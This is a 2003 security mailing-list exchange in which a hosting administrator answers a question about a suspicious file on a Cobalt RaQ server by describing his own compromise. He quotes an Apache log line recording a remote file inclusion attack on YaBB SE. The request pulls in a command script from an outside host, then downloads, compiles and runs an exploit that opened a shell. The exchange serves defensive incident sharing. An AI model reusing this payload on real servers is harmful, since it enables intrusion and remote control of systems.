I've had one this weekend too, hacker used an exploit in yabbse in this way:
<hidden> - - [22/Mar/2003:15:46:15 +0100] "GET /yabbse/Sources/Packages.php?sourcedir=http://lesl13.hpg.com.br/cmd.txt?&cmd=md=mkdir%20/var/tmp/.xpl;%20cd%20/var/tmp/.xpl;%20wget%20www.lesl13.hpg.com.br/dsl.c;%20gcc%20-o%20dsl%20dsl.c;%20./dsl HTTP/1.1" 200 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Thus I had a ./dsl script running as user httpd which actually opened up a terminal for hackers..
At 01:28 PM 3/20/2003 -0800, Nathan Kondra wrote:
I have found a weird file on my box.
It is a RAQ 4i the file was ./sushi
it is attached I belive that i have been rooted some how and this file is
the key, Can any one help me figure out what the hell this thing is and what
it has been doing to my system.
Nathan Kondra
PS If needed i can attach the file
_______________________________________________
cobalt-security mailing list
[EMAIL PROTECTED]
http://list.cobalt.com/mailman/listinfo/cobalt-security
Met vriendelijke groet,
Jeroen Wunnink,
[EMAIL PROTECTED]
telefoon:+31 (035) 6285455
fax: +31 (035) 6838242
http://www.easyhosting.nl
_______________________________________________ cobalt-security mailing list [EMAIL PROTECTED] http://list.cobalt.com/mailman/listinfo/cobalt-security
